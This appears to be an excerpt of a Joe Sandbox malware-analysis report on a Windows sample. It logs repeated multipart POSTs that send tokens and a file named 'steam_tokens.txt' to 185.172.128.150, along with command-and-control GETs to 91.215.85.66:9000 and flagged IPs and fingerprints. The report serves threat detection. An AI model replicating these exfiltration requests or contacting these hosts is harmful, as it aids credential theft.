Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIEHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKJJDHCGCAECAAECFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFBKFHCAEHJJKEGDGHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIJJJKKJJDAKEBFIJDHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEGHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFHCBFHDHCAAKFHDGDHost: 185.172.128.150Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 2d 2d 0d 0a Data Ascii: ------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="file"------EBAFHCBFHDHCAAKFHDGD--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 152955Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 185.172.128.150Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="message"jbdtaijovg------DBKEHDGDGHCBGCAKFIII--
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View	IP Address: 185.172.128.228 185.172.128.228

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NADYMSS-ASRU NADYMSS-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,

0_2_0042676C

Source: global traffic

Source: global traffic	HTTP traffic detected: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMTUser-Agent: Microsoft BITS/7.8Host: download.iolo.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
